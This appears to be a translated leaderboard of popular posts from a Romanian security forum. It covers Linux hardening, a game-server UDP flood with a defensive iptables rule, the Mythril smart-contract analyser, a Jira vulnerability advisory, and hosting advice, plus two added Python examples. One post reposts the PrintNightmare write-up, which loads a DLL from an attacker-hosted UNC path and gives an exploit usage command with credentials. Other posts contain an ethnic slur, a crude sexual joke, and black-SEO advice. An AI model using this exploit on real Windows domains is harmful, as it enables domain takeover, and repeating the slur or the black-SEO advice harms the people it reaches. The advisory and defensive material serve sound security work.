Leaderboard

Popular Content

Showing content with the highest reputation since 07/01/21 in all areas

  1. We're no longer in 2006, when there were SMS and email bombers on every street corner. Applications that send SMS messages are usually protected against this kind of thing, and if a large flood of SMS requests does happen, it won't take long before someone gets an alert and fixes the problem. That's why you won't see a bomber published anywhere, or anyone risking giving you theirs.
    6 points
  2. https://www.debian.org/CD/verify Most distros come with signed checksums. You download the files, compute their hash (locally, on your PC) and check whether the computed hash matches the official one, signed by the author. That way you know 100% that what you downloaded is the official version, without modifications by third parties. Whether or not you trust the authors is a much more complicated problem. Some distros have public source code, independent security audits, and are used by large companies in safety-critical situations. All these aspects inspire trust, but you can never be 100% sure. There might be a Remote Code Execution in the UNIX kernel. There might be an exploit in the network card hardware. At the extreme: can you trust "process monitor" or "firewall"? Maybe they themselves are infected! In short: nobody is going to steal those $10 from sports betting or forex that you're investing in crypto auto-trading. You'll get them out quickly through an offshore and put them into the dental practice. I'd bet your bot will lose your money on margin trades. Good luck!
    5 points
  3. Go screw yourself, you mustachioed gypsy, with your politics and your whores. @taffy00 send me a private message with what you need and your address. I have whole boxes of children's clothes and everything you need, and I can also help you with some money.
    5 points
  4. If you want to run some crypto bot or other, I don't think you need to worry that the NSA put a backdoor in there; they won't much care unless you're some world-class important person (e.g. the director of a nuclear plant in Iran). Securing it is fairly simple:
     1. Update as often as possible
     2. Don't install all kinds of junk
     3. Remove the things you don't need, such as services you don't use
     4. Leave only SSH, with key auth, and that's it
     5. You can do a lot of hardening, but you don't really need it
     If you want, you can verify a Linux distribution and be sure it has no backdoor, except it will take a few thousand years:
     1. Take all the source code and compile it
     2. Do a reproducible build if possible; if not, diff what you have in the distribution against what gets compiled
     3. Check all the differences (there will be some) caused by patches, modifications or configuration
     4. Review all the source code, from the kernel to every installed program, and make sure it has no backdoor
     5. Bonus: look for vulnerabilities while you're at it
     Now, more seriously, there isn't much you can do as one individual. If a few thousand people got together, something like this could be done, but it would still take months or even years (without any updates happening in the meantime). As for that distribution, I haven't heard of it; why did you choose it? Why not something "classic": Debian, CentOS, Ubuntu, Kali etc.?
    4 points
  5. If you want to play a good prank on your friend, surprise him with a blowjob.😋
    4 points
  6. This one is looking for people for a scam; his details should be forwarded to the police/OLX, if they'd even be interested in something like this 👮‍♂️ *bonus:
    3 points
  7. I'll send you a package with cold cuts, milk, wheat, ... food; I don't have clothes for a 2-year-old. Leave me a private message. Edit: + 10 vouchers for 20% off at Kaufland
    3 points
  8. Weren't you a doctor, or am I confusing you with someone?
    3 points
  9. TLDR - Use AWS serverless and focus as much as you can on APIs
    3 points
  10. Some additional details wouldn't hurt. Publicly or in private. Program name, vendor, download link if it (still) exists, etc. Software licensing is generally a sensitive matter for software developers. Some use technologies made by others to license their own products, some rely on their own intelligence/creativity. It depends a lot on whether the purchased license is (or was) tied to a particular hardware platform (hardware ID, HDD serial ...), whether some response is expected from an online server, etc. There are many licensing methods, so without additional details I don't think we can come up with the saving solution. A solution which may exist ... or not.
    2 points
  11. I sent you a private message... PayPal works too
    2 points
  12. Dr. Ruby, I think she's better at other things than medicine. Here's her LinkedIn profile, she is NOT a doctor: https://www.linkedin.com/in/dr-jane-ruby-49971411/ Well, actually she is a doctor, a doctor of psychology. A doctor is mentioned in the video, a HOMEOPATHIC doctor (they forgot to say that). And that Gigel puts out articles like this every day. At least look at the comments on Facebook, some are pertinent. Welcome to the Internet, where anything anyone says is true.
    2 points
  13. You can tell how well it pays if they didn't pay a translator for the ad.
    2 points
  14. They're OK if you already have some kind of base and want a certification. For example, I had a chapter dedicated to JavaScript frameworks which shoved all the frameworks down my throat and then asked me minuscule things from each framework that are mentioned once or twice in the whole course. Likewise, the mandatory foreign language courses aren't well structured (for example German A2 teaches you for B2/C1) and you barely pass them without retaining much.
    2 points
  15. What are people still doing with SSH scanners and "roots" in 2021? If you really understood the errors you wouldn't be asking the question, you'd be fixing them. We'll also deal with errors if you have a legitimate situation.
    2 points
  16. Solved! Everyone is happy. From what I understand they made a restriction on queries: INFO PLAYER RULES; you can find them at the Valve link above. Thank you very much for your time and the time you gave ❤️ Have a nice evening and a pleasant weekend.
    2 points
  17. Hi. I also had a look there. It seems you're dealing with https://security.stackexchange.com/questions/168375/how-to-prevent-tsource-engine-query-ddos-attack At least that's what I see from the packets:
          01:20:05.675519 IP (tos 0xc, ttl 113, id 30221, offset 0, flags [none], proto UDP (17), length 53)
              157.166.145.173.29350 > 5.254.116.174.27016: [udp sum ok] UDP, length 25
              0x0000:  450c 0035 760d 0000 7111 299f 9da6 91ad  E..5v...q.).....
              0x0010:  05fe 74ae 72a6 6988 0021 bac3 ffff ffff  ..t.r.i..!......
              0x0020:  5453 6f75 7263 6520 456e 6769 6e65 2051  TSource.Engine.Q
              0x0030:  7565 7279 00                             uery.
          01:20:05.675691 IP (tos 0xc, ttl 113, id 2253, offset 0, flags [none], proto UDP (17), length 53)
              121.140.205.177.55813 > 5.254.116.174.27016: [udp sum ok] UDP, length 25
              0x0000:  450c 0035 08cd 0000 7111 7ef5 798c cdb1  E..5....q.~.y...
              0x0010:  05fe 74ae da05 6988 0021 3b7a ffff ffff  ..t...i..!;z....
              0x0020:  5453 6f75 7263 6520 456e 6769 6e65 2051  TSource.Engine.Q
              0x0030:  7565 7279 00                             uery.
      I'd try an iptables filter, something like:
          iptables -A INPUT -p UDP --dport 27016 -m string --hex-string '|5453 6f75 7263 6520 456e 6769 6e65 2051|' --algo kmp -j DROP
      The rule would show up something like:
          0 0 DROP udp -- * * 0.0.0.0/0 0.0.0.0/0 udp dpt:27016 STRING match "TSource Engine Q" ALGO name kmp TO 65535
    2 points
  18. What's happening with the forum? Is it still active? Ever since the vaccination there haven't been any quality posts; could it be from the vaccine? Or maybe you're in Miami with the green passport?
    2 points
  19. A theoretical solution, but one that would take some time, would be the following:
      1. Monitor performance and catch such an attack while it's happening
      2. Start a tcpdump and capture packets for a certain period, say 2-5 minutes
      3. Analyze and see which packets are coming in a frenzy
      4. Block them (but check that nothing breaks)
      Another possible solution would be logs from the CS servers, if they exist. If they can be put in a more "verbose" mode, that's ideal. Maybe, somehow, lots of logs with certain things show up. Have you tried SYN cookies? https://tldp.org/LDP/solrhe/Securing-Optimizing-Linux-RH-Edition-v1.3/chap5sec56.html Actually I think CS uses UDP, as far as I know. That means the DDoS can theoretically be "amplified" through various vulnerabilities in servers on the Internet, but the packets aren't valid. Better make such a tcpdump, and if you think it doesn't contain anything "sensitive" you can give it to us to look over. We don't guarantee we'll find something, but we can try. PS: If CS is only on port 27.001 you could capture only the data on that port, but it would be useful to look at the others too, who knows what else is around there.
    2 points
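Putting replies #17 and #19 above into practice, as an added Python example that is not code from the thread: it parses raw IPv4/UDP frames like the quoted tcpdump output, matches the same "TSource Engine Q" bytes the suggested iptables rule looks for, and rate-limits per source instead of dropping every query. The thresholds, the destination address in the constructed frames and the flooding source addresses are made up.

```python
"""A2S_INFO ("TSource Engine Query") flood detection over raw IPv4/UDP frames.

Added example for replies #17 and #19 above; not code from the forum thread.
Thresholds, the destination address used in constructed frames and the
flooding source addresses are made up for the test replay.
"""
import struct
from collections import defaultdict, deque

GAME_PORT = 27016
# The same bytes the suggested iptables rule matches ('|5453 6f75 ... 2051|').
A2S_INFO_PATTERN = bytes.fromhex("5453 6f75 7263 6520 456e 6769 6e65 2051")

# First packet of the tcpdump output quoted in reply #17, hex columns joined.
CAPTURED_PACKET = bytes.fromhex(
    "450c 0035 760d 0000 7111 299f 9da6 91ad"
    "05fe 74ae 72a6 6988 0021 bac3 ffff ffff"
    "5453 6f75 7263 6520 456e 6769 6e65 2051"
    "7565 7279 00"
)


def parse_ipv4_udp(frame):
    """Return (src_ip, dst_ip, sport, dport, payload) for an IPv4/UDP frame, else None."""
    if len(frame) < 20 or frame[0] >> 4 != 4:
        return None
    ihl = (frame[0] & 0x0F) * 4
    total_len = struct.unpack("!H", frame[2:4])[0]
    if frame[9] != 17 or total_len > len(frame) or total_len < ihl + 8:
        return None  # not UDP, truncated capture, or no room for a UDP header
    src_ip = ".".join(str(b) for b in frame[12:16])
    dst_ip = ".".join(str(b) for b in frame[16:20])
    sport, dport, udp_len, _checksum = struct.unpack("!HHHH", frame[ihl:ihl + 8])
    end = min(ihl + udp_len, total_len)  # never read past the IP total length
    return src_ip, dst_ip, sport, dport, frame[ihl + 8:end]


def is_a2s_info_query(dport, payload):
    """The test the iptables rule performs: UDP to the game port carrying the pattern."""
    return dport == GAME_PORT and A2S_INFO_PATTERN in payload


class QueryFloodDetector:
    """Flag a source once it sends more than max_queries A2S_INFO requests per window.

    Legitimate clients and the Steam server browser send the same query, so a
    per-source rate limit is gentler than dropping every match as the iptables
    rule does. Spoofed sources still defeat per-source counting, which is why
    the challenge-based fixes discussed in the linked thread exist.
    """

    def __init__(self, max_queries=20, window_seconds=1.0):
        self.max_queries = max_queries
        self.window = window_seconds
        self._timestamps = defaultdict(deque)

    def observe(self, ts, frame):
        """Feed one frame with its capture timestamp; True when its source is flooding."""
        parsed = parse_ipv4_udp(frame)
        if parsed is None:
            return False
        src_ip, _dst_ip, _sport, dport, payload = parsed
        if not is_a2s_info_query(dport, payload):
            return False
        seen = self._timestamps[src_ip]
        seen.append(ts)
        while seen and ts - seen[0] > self.window:
            seen.popleft()
        return len(seen) > self.max_queries


def build_query_frame(src_ip, sport, dst_ip="10.0.0.5"):
    """Constructed IPv4/UDP A2S_INFO request (checksums zeroed) for offline testing."""
    payload = b"\xff\xff\xff\xffTSource Engine Query\x00"
    udp = struct.pack("!HHHH", sport, GAME_PORT, 8 + len(payload), 0) + payload
    ip_header = struct.pack(
        "!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
        bytes(int(o) for o in src_ip.split(".")),
        bytes(int(o) for o in dst_ip.split(".")),
    )
    return ip_header + udp


def flooding_sources(frames, max_queries=20, window_seconds=1.0):
    """Replay (timestamp, frame) pairs from a capture; return the sources flagged."""
    detector = QueryFloodDetector(max_queries, window_seconds)
    return sorted({parse_ipv4_udp(f)[0] for ts, f in frames if detector.observe(ts, f)})
```

Feed `flooding_sources` the (timestamp, raw frame) pairs from a capture taken during an attack, as reply #19 suggests, and it returns the addresses worth blocking rather than every client that ever asked for server info.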
  20. Mythril is a security analysis tool for EVM bytecode. It detects security vulnerabilities in smart contracts built for Ethereum, Hedera, Quorum, Vechain, Rootstock, Tron and other EVM-compatible blockchains. It uses symbolic execution, SMT solving and taint analysis to detect a variety of security vulnerabilities. It's also used (in combination with other tools and techniques) in the MythX security analysis platform.

      If you are a smart contract developer, we recommend using MythX tools, which are optimized for usability and cover a wider range of security issues. Whether you want to contribute, need support, or want to learn what we have cooking for the future, our Discord server will serve your needs.

      Installation and setup

      Get it with Docker:
          $ docker pull mythril/myth
      Install from PyPI:
          $ pip3 install mythril
      See the docs for more detailed instructions.

      Usage

      Run:
          $ myth analyze <solidity-file>
      Specify the maximum number of transactions to explore with -t <number>. You can also set a timeout with --execution-timeout <seconds>.

      Example (source code):
          > myth a killbilly.sol -t 3
          ==== Unprotected Selfdestruct ====
          SWC ID: 106
          Severity: High
          Contract: KillBilly
          Function name: commencekilling()
          PC address: 354
          Estimated Gas Usage: 574 - 999
          The contract can be killed by anyone.
          Anyone can kill this contract and withdraw its balance to an arbitrary address.
          --------------------
          In file: killbilly.sol:22

          selfdestruct(msg.sender)

          --------------------
          Transaction Sequence:

          Caller: [CREATOR], data: [CONTRACT CREATION], value: 0x0
          Caller: [ATTACKER], function: killerize(address), txdata: 0x9fa299ccbebebebebebebebebebebebedeadbeefdeadbeefdeadbeefdeadbeefdeadbeef, value: 0x0
          Caller: [ATTACKER], function: activatekillability(), txdata: 0x84057065, value: 0x0
          Caller: [ATTACKER], function: commencekilling(), txdata: 0x7c11da20, value: 0x0

      Instructions for using Mythril are found on the docs. For support or general discussions please join the Mythril community on Discord.

      Building the Documentation

      Mythril's documentation is contained in the docs folder and is published to Read the Docs. It is based on Sphinx and can be built using the Makefile contained in the subdirectory:
          cd docs
          make html
      This will create a build output directory containing the HTML output. Alternatively, PDF documentation can be built with make latexpdf. The available output format options can be seen with make help.

      Vulnerability Remediation

      Visit the Smart Contract Vulnerability Classification Registry to find detailed information and remediation guidance for the vulnerabilities reported.

      Download mythril-develop.zip or git clone https://github.com/ConsenSys/mythril.git

      Source
    2 points
  21. In fact, the signal that gets to your satellite receiver is usually about -50dBm. (...) and that means the signal is… .00000001 watts https://blog.solidsignal.com/tutorials/satellite-signals-are-measured-in-dbm-but-whats-a-dbm/ Usually the signal is amplified from the dish to the TV (and the amplifier draws power). The satellite/4G tower transmits between 100 and 2000 W. But the power is spread over a very large area. In the 4G case, 500 W are spread over an entire city. In the case of satellites, 2 kW are spread over all of North America.
    2 points
  22. In my whole life I haven't seen a person who talks more strangely than this reporter from ProTV; my mind literally freezes listening to him. PS: we're still waiting for the dead-drunk American soldier who killed Teo Peter to stand trial.
    2 points
  23. He handed the country over to foreigners? Did he destroy even one factory from the 90s until now, this individual with whom I've had no connection whatsoever? These news stories are hogwash. Total hogwash. I'm fed up with imposed political correctness! Don't take this as me encouraging it, but still, he's small fry compared to the no-bid contracts during the pandemic or Romania's hospitals full of infections.
    2 points
  24. PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service

      Ten years ago, an escalation of privilege bug in the Windows Printer Spooler was used in Stuxnet, the notorious worm that destroyed Iran's nuclear enrichment centrifuges and infected more than 45000 networks. In the past ten years, the spooler has still had an endless stream of vulnerabilities disclosed, some of which are not known to the world; however, they are hidden bombs that could lead to disasters. Therefore, we have focused on the spooler over the past months and reaped fruitfully. The beginning of the research was PrintDemon, from which we drew inspiration. After digging deeper into this bug, we found a way to bypass MS's patch. And just after MS released the new version, we immediately found a new way to exploit it again. After the story of PrintDemon, we realized that the spooler is still a good attack surface, although security researchers have hunted for bugs in it for more than ten years. We started to explore the inner workings of the Printer Spooler and discovered some 0-day bugs in it. Some of them are more powerful than PrintDemon and easier to exploit, and the others can be triggered remotely, which could lead to remote code execution.

      CVE-2021-1675 is a remote code execution in the Windows Print Spooler. According to the MSRC security bulletin, this vulnerability was reported by Zhipeng Huo, Piotr Madej and Zhang Yunhai. We also found this bug before and hoped to keep it secret to participate in Tianfu Cup ☹. As some people have already published an exploit video of CVE-2021-1675, here we publish our writeup and exploit for CVE-2021-1675. For more RCE and LPE vulnerabilities in the Windows Spooler, please stay tuned and wait for our Black Hat talk 'Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer'.

      RpcAddPrinterDriver

      Adding a Printer Driver to a Server (RpcAddPrinterDriver). Let's check MS-RPRN: Print System Remote Protocol about the RpcAddPrinterDriver call:

          To add or update a printer driver ("OEM Printer Driver") to a print server ("CORPSERV"), a client ("TESTCLT") performs the following steps. The client can use the RPC call RpcAddPrinterDriver to add a driver to the print server. The client ensures that the files for the printer driver are in a location accessible to the server. For that purpose, the client can share a local directory containing the files, or use [MS-SMB] to place the files into a directory on the server. The client then allocates and populates a DRIVER_INFO_2 structure as follows:

              pName = L"OEM Printer Driver";
              pEnvironment = L"Windows NT x86"; /* Environment the driver is compatible with */
              pDriverPath = "\\CORPSERV\C$\DRIVERSTAGING\OEMDRV.DLL";
              pDataFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMDATA.DLL";
              pConfigFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMUI.DLL";

          The client allocates a DRIVER_CONTAINER driverContainer structure and initializes it to contain the DRIVER_INFO_2 structure. The client calls RpcAddPrinterDriver.

              RpcAddPrinterDriver( L"\\CORPSERV", &driverContainer );

      CVE-2021-1675 Analysis

      Clearly, if an attacker can bypass the authentication of RpcAddPrinterDriver, he could install a malicious driver on the print server. According to MSDN, the client needs SeLoadDriverPrivilege to call the RPC. However, this isn't true. Let's check the authentication logic here: ValidateObjectAccess is a normal security check for the Spooler Service. But in lines 19 and 20, argument a4 is user-controllable. So a normal user can bypass the security check and add a driver. If you are in a domain, a normal domain user can connect to the Spooler service on the DC and install a driver onto the DC. Then he can fully control the domain.

      Exploit

      But the real attack is not that simple. To exploit the authentication bypass bug, we need to understand what the Spooler service does when you call RpcAddPrinterDriver. Suppose you supply these paths to the service:

          pDataFile = A.dll
          pConfigFile = \\attackerip\Evil.dll
          pDriverPath = C.dll

      It will copy A, B and C into the folder C:\Windows\System32\spool\drivers\x64\3\new. Then it will copy them to C:\Windows\System32\spool\drivers\x64\3, and load C:\Windows\System32\spool\drivers\x64\3\A.dll and C:\Windows\System32\spool\drivers\x64\3\C.dll into the Spooler service. However, in the latest version, the Spooler checks to make sure that A and C are not UNC paths. But since B can be a UNC path, we can set pConfigFile to a UNC path (an evil DLL). This makes our Evil.dll get copied to C:\Windows\System32\spool\drivers\x64\3\Evil.dll. Then call RpcAddPrinterDriver again, setting pDataFile to C:\Windows\System32\spool\drivers\x64\3\Evil.dll. It will load our evil DLL.

      Unfortunately, it does not work, because if you set A, B, C in the folder C:\Windows\System32\spool\drivers\x64\3, there will be an access conflict in the file copy. To bypass this, we need to use the backup feature of the driver upgrade. If we upgrade some driver, the old version is backed up into the C:\Windows\System32\spool\drivers\x64\3\old\1\ folder. Then we can bypass the access conflict and successfully inject our evil.dll into the spooler service. Successfully loaded our DLL:

      Usage

          .\PrintNightmare.exe dc_ip path_to_exp user_name password

      Example:

          .\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123##

      Tested on Windows Server 2019 1809 17763.1518

      Impact

      This vulnerability can be used to achieve LPE and RCE. As for the RCE part, you need a user authenticated to the Spooler service. However, this is still critical in a domain environment, because normally a DC will have the Spooler service enabled, and a compromised domain user may use this vulnerability to control the DC.

      Here are more hidden bombs in the Spooler, which are not publicly known. We will share more RCE and LPE vulnerabilities in the Windows Spooler; please stay tuned and wait for our Black Hat talk 'Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer'.

      Credit: Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)

      Source: https://github.com/afwu/PrintNightmare
    2 points
  25. Do you even have an ahrefs account? Then post the keywords so we can analyze them too, or send a message. Internal links: how often do you make internal links? If you use the same word for the same internal link, Google penalizes you; it hates that.
    2 points
  26. The software-engineering platform is urging users to patch the critical flaw ASAP.

      Atlassian has dropped a patch for a critical vulnerability in many versions of its Jira Data Center and Jira Service Management Data Center products, which can lead to arbitrary code execution. Atlassian is a platform that’s used by 180,000 customers to engineer software and manage projects, and Jira is its proprietary bug-tracking and agile project-management tool.

      On Wednesday, Atlassian issued a security advisory concerning the vulnerability, which is tracked as CVE-2020-36239. The bug could enable remote, unauthenticated attackers to execute arbitrary code in some Jira Data Center products. BleepingComputer got ahold of an email Atlassian sent to enterprise customers on Wednesday that urged them to update ASAP.

      The vulnerability has to do with a missing authentication check in Jira’s implementation of Ehcache, which is an open-source, Java distributed cache for general-purpose caching, Java EE and lightweight containers that’s used for performance and which simplifies scalability. Atlassian said that the bug was introduced in version 6.3.0 of Jira Data Center, Jira Core Data Center, Jira Software Data Center and Jira Service Management Data Center (known as Jira Service Desk prior to 4.14).

      According to Atlassian’s security advisory, that list of products exposed an Ehcache remote method invocation (RMI) network service that attackers – who can connect to the service on port 40001 and potentially 40011 – could use to “execute arbitrary code of their choice in Jira” through deserialization, due to missing authentication.

      RMI is an API that acts as a mechanism to enable remote communication between programs written in Java. It allows an object residing in one Java virtual machine (JVM) to invoke an object running on another JVM; often, it involves one program on a server and one on a client. The advantage of RMI, as BleepingComputer describes it, is that

      [Figure: Workings of RMI. Source: Wikipedia.]

      Atlassian “strongly suggests” restricting access to the Ehcache ports to only Data Center instances, but noted that there’s a caveat: “Fixed versions of Jira will now require a shared secret in order to allow access to the Ehcache service,” according to the advisory.

      Affected Versions

      These are the affected versions of Jira Data Center and Jira Service Management Data Center:

      Jira Data Center, Jira Core Data Center, and Jira Software Data Center – ranges:
          6.3.0 <= version < 8.5.16
          8.6.0 <= version < 8.13.8
          8.14.0 <= version < 8.17.0
      Jira Service Management Data Center – ranges:
          2.0.2 <= version < 4.5.16
          4.6.0 <= version < 4.13.8
          4.14.0 <= version < 4.17.0

      Jira Data Center, Jira Core Data Center, and Jira Software Data Center:
          All 6.3.x, 6.4.x versions
          All 7.0.x, 7.1.x, 7.2.x, 7.3.x, 7.4.x, 7.5.x, 7.6.x, 7.7.x, 7.8.x, 7.9.x, 7.10.x, 7.11.x, 7.12.x, 7.13.x versions
          All 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x versions
          All 8.5.x versions before 8.5.16
          All 8.6.x, 8.7.x, 8.8.x, 8.9.x, 8.10.x, 8.11.x, 8.12.x versions
          All 8.13.x versions before 8.13.8
          All 8.14.x, 8.15.x, 8.16.x versions
      Jira Service Management Data Center:
          All 2.x.x versions after 2.0.2
          All 3.x.x versions
          All 4.0.x, 4.1.x, 4.2.x, 4.3.x, 4.4.x versions
          All 4.5.x versions before 4.5.16
          All 4.6.x, 4.7.x, 4.8.x, 4.9.x, 4.10.x, 4.11.x, 4.12.x versions
          All 4.13.x versions before 4.13.8
          All 4.14.x, 4.15.x, 4.16.x versions

      Atlassian’s advisory said that customers who have downloaded and installed any affected versions “must upgrade their installations immediately to fix this vulnerability.” Having said that, Atlassian also noted that the “critical” rating is its own assessment and that customers “should evaluate its applicability to your own IT environment.”

      Non-Affected Versions

      Here’s the list of products that aren’t affected by the flaw:
          Atlassian Cloud
          Jira Cloud
          Jira Service Management Cloud
          Non-Data Center instances of Jira Server (Core & Software) and Jira Service Management

      Also, customers who have upgraded Jira Data Center, Jira Core Data Center, Jira Software Data Center to versions 8.5.16, 8.13.8, 8.17.0 and/or Jira Service Management Data Center to versions 4.5.16, 4.13.8 or 4.17.0 are off the hook: they don’t need to upgrade.

      Atlassian is Attacker Catnip

      Some of the largest enterprises with the most sophisticated product development use Atlassian products. Among its more than 65,000 users, Jira counts some big fans, including the likes of the Apache Software Foundation, Cisco, Fedora Commons, Hibernate, Pfizer and Visa. Unfortunately, its popularity – particularly with the big fish – and its capabilities make it a tempting target for attackers. In June, researchers uncovered Atlassian bugs that could have led to one-click takeover: a scenario that brought to mind the potential for an exploit that would have been similar to the SolarWinds supply-chain attack, in which attackers used a default password as an open door into a software-updating mechanism.

      Chris Morgan, senior cyber-threat intelligence analyst at digital-risk provider Digital Shadows, said that the vulnerability at the heart of Wednesday’s advisory is just the latest in a series of bugs facing software engineering and management platforms that, if exploited, “could lead to a range of pernicious outcomes.” While there’s no evidence of active exploitation at this time, we can expect attempts to show up in the coming one to three months, Morgan predicted. He pointed to several recent supply-chain attacks, including attacks against software providers Accellion and Kaseya, that have leveraged vulnerabilities to gain initial access and to compromise software builds “known to be used by a diverse client base.”

      Other security experts agreed with Morgan’s assessment. Andrew Barratt, managing principal of solutions and investigations at cybersecurity advisory firm Coalfire, told Threatpost on Thursday that the vulnerability Atlassian disclosed on Wednesday “shows that attackers are still looking to leverage economies of scale and compromise multiple parties using single platform-wide vulnerabilities.”

      Expect Exploitation, In the Wild Attacks

      TL;DR: Apply the update ASAP, or implement Atlassian’s workarounds, Morgan emphasized. On the optimistic side, the issue may blow over before it gets dire, given that Atlassian is already issuing patches and advising on temporary mitigations, Barratt added. Barratt thinks that the most concerning thing should be “the renewed focus on potentially a gold mine of opportunity.” While targeting developers isn’t new, he said, targeting their tools, platform and reducing potential confidence in the product “shows the need for security orchestration tools that can help bring the diversity of the problem to single-management view.”

      On the technical side of things, Shawn Smith – director of infrastructure at application security provider nVisium – posited that supply-chain attacks are a good argument against auto-updating dependencies, but “this also means that security teams have to monitor and manage them effectively and efficiently,” as he told Threatpost via email on Thursday.

      Via threatpost.com
    1 point
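A version check for the affected ranges listed in the article above, as an added Python example that is not code from the article or from Atlassian: it parses two- or three-part Jira version strings, applies the half-open ranges per product family (the upper bound of each range is the first fixed release), and treats Cloud and non-Data Center editions as unaffected, as the article's non-affected list states. The inventory rows used in the test are constructed.

```python
"""Check Jira Data Center versions against the CVE-2020-36239 advisory ranges.

Added example, not code from the Threatpost article or from Atlassian. It
encodes the three affected ranges per product family quoted above; the upper
bound of each range is the first fixed release on that line.
"""
import re

# "jira" covers Jira Data Center, Jira Core Data Center and Jira Software Data Center;
# "jsm" covers Jira Service Management Data Center (Jira Service Desk before 4.14).
AFFECTED_RANGES = {
    "jira": [((6, 3, 0), (8, 5, 16)), ((8, 6, 0), (8, 13, 8)), ((8, 14, 0), (8, 17, 0))],
    "jsm": [((2, 0, 2), (4, 5, 16)), ((4, 6, 0), (4, 13, 8)), ((4, 14, 0), (4, 17, 0))],
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?$")


def parse_version(text):
    """'8.13.3' -> (8, 13, 3); '4.14' -> (4, 14, 0). Anything else is rejected."""
    m = _VERSION_RE.match(text.strip())
    if m is None:
        raise ValueError("unrecognised Jira version: %r" % text)
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def fixed_version_for(product, version, data_center=True):
    """Return the first fixed release for an affected version as 'x.y.z', else None.

    Ranges are half-open (low <= v < high), so the high bound itself is fixed.
    Cloud and non-Data Center Server editions are not on the affected list.
    """
    if not data_center:
        return None
    v = parse_version(version)
    for low, high in AFFECTED_RANGES[product]:
        if low <= v < high:
            return ".".join(str(n) for n in high)
    return None


def is_affected(product, version, data_center=True):
    """True when the version falls inside one of the advisory's affected ranges."""
    return fixed_version_for(product, version, data_center) is not None


def triage(inventory):
    """Map each (host, product, version, data_center) row to the upgrade it needs, or None."""
    return {host: fixed_version_for(p, v, dc) for host, p, v, dc in inventory}
```

Until the upgrade lands, the article's interim mitigation applies to every host that `triage` maps to a version: restrict the Ehcache RMI ports (40001 and 40011) to the other Data Center nodes.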
  27. Please post a link without adf.ly or other URL-shortener junk with ads.
    1 point
  28. I'm in England; over here cases are at 50k, and the government just lifted everything, and the prime minister is in isolation.
    1 point
  29. I went for a week, i.e. one course with them, for CCNA, and I got the picture. I'm not a fan of academies, classes, group learning, etc. Why? Simple. Someone there, in your group, may be weaker than you. He'll hold you back. Or maybe you learn more slowly. The rest will get ahead of you. So forget about academies. If you want to be a programmer, learn to do your own research.
    1 point
  30. Hi, I have no details about such companies; I'd expect you'd learn things there. I don't know how much that diploma you get matters, but from what I remember the courses stretch over a huge amount of time. If, for example, a course lasts 6 months... in 6 months you can learn to design rockets (if you're not just working 2 hours a week).
    1 point
  31. Maybe because the topic and the offer are 11 years old? Now for 20 lei you get unlimited in any network, minutes and messages and all that... I don't think anyone needs this much fuss for 100 minutes anymore.
    1 point
  32. I've been using an Aruba Cloud VPS for 2 years and haven't had uptime problems, not even a single outage, and it's low-cost; RDP works, VMs work, Chrome runs reasonably, Python scripts with requests every millisecond work, gigabyte speed, per-minute cronjobs without problems. They don't meter bandwidth as they claim, maybe only if you have very high traffic... The thing is that when I got it, it was the Ubuntu 16.04 Virtual Desktop version, and I don't think that's available anymore, and if you put 20 on this configuration I don't know what to say; just get an ordinary server that isn't a Virtual Desktop by default and install RDP, the desktop, etc. yourself. The bad part is that 2 years ago it was 4 euro and now it's 6.50 and will probably keep rising... The ones from Vultr are OK too https://www.vultr.com/products/cloud-compute/#pricing
    1 point
  33. https://www.optimusdigital.ro/en/raspberry-pi-boards/8617-raspberry-pi-4-model-b4gb-765756931182.htm It doesn't have to be coded like an Arduino; Python works without any problem. You put Debian Linux on it and can do anything you want with it. I, for example, use one for a NAS and another for TV streaming.
    1 point
  34. Depending on the resources your scripts need, you can try a VPS, which you won't hear running, and at 6 euro a month it's a good price. If you want to own the hardware, you can look on OLX or similar platforms for an SFF. They usually cost a few hundred lei... and come with an i5/i7 and 8 or 16 GB of RAM. I bought one about 2 years ago to make a router out of it.
    1 point
  35. Try a gaming server from OVH. They have a very good firewall for this kind of attack. If everything's OK you can migrate the other servers too.
    1 point
  36. Yes, although it has some issues working with the latest Fortinet ... I'm tweaking it a little, it used to work perfectly with Fortinet client 6.x, but in 7.0 something has changed.
    1 point
  37. Where did you get the statistics? I know someone selling everything related to GSA content uniq generator. I'll come back with a price after they reply, in case you're interested.
    1 point
  38. Use black SEO if you don't want to invest in SEO. I can't give details here about black SEO, CVs, etc... At its current age you should by now have owned 2 more websites in nearby niches like dating, tourism, etc., on which to display the adult banners; you'd make a loop, if you get it. When you write "What else should I do to grow it in Google!?" give some details: on which search page it appears, what PR it has, how many backlinks, what authority they have; publish a report and blur what you don't want shown, etc.
    1 point